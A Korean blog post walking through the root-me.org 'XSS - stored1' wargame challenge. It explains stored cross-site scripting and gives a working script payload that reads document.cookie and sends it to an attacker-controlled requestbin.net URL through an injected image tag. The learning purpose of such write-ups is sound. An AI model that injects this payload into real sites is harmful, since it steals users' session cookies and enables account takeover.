티스토리 뷰

web wargame/root-me.org

XSS - stored1

삼전동해커 2021. 1. 5. 20:08


XSS문제다. 처음 도전해본 XSS. 

개념은 일단 게시판과 같이 사용자가 쓰기 권한이 있는 곳에 악성코드를 올려 저장하고,

다른 사용자가 접근해 글을 읽으면 악성코드가 실행되는 공격.

라고 개념만 알고 있다.


일단 스크립트를 이용해 alert창을 띄워보자.



이렇게 보내보자.



이렇게 alert창이 뜬다.


그리고 XSS에서 중요한게 쿠키값을 이용하는 것이다.


document.cookie를 찾아보자.






하지만 안된다.



document.write("<img src='http://내 url?="+document.cookie+"'></img>");


이렇게 보내면 된다고 한다.

document.write는 출력을 해주는 스크립트이고

img태그로 src를 내 url의 쿠키값을 정해준다.


이 때 url을 서버로 지정해 주어야 한다.

아파치 서버라던가,


http://requestbin.net/


이 사이트를 이용하면 된다.



여기서 create a requestbin을 클릭해서



이렇게 url을 만들어준다.


이걸 스크립트 코드에 넣어준다.


<script>document.write("<img src='여기에 url?="+document.cookie+"'></img>");</script>



이렇게 만들어서 보내주면

requestbin 사이트에



이렇게 쿠키값이 나온다.


한번에 안되니 여러번 시도해 보자.


'web wargame > root-me.org' 카테고리의 다른 글

root-me double-extensions  (0) 2021.01.12
root-me CRLF  (0) 2021.01.07
[root-me] path traversal  (0) 2020.09.22
http improper redirect  (0) 2020.09.21
http verb tampering  (0) 2020.09.21
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
글 보관함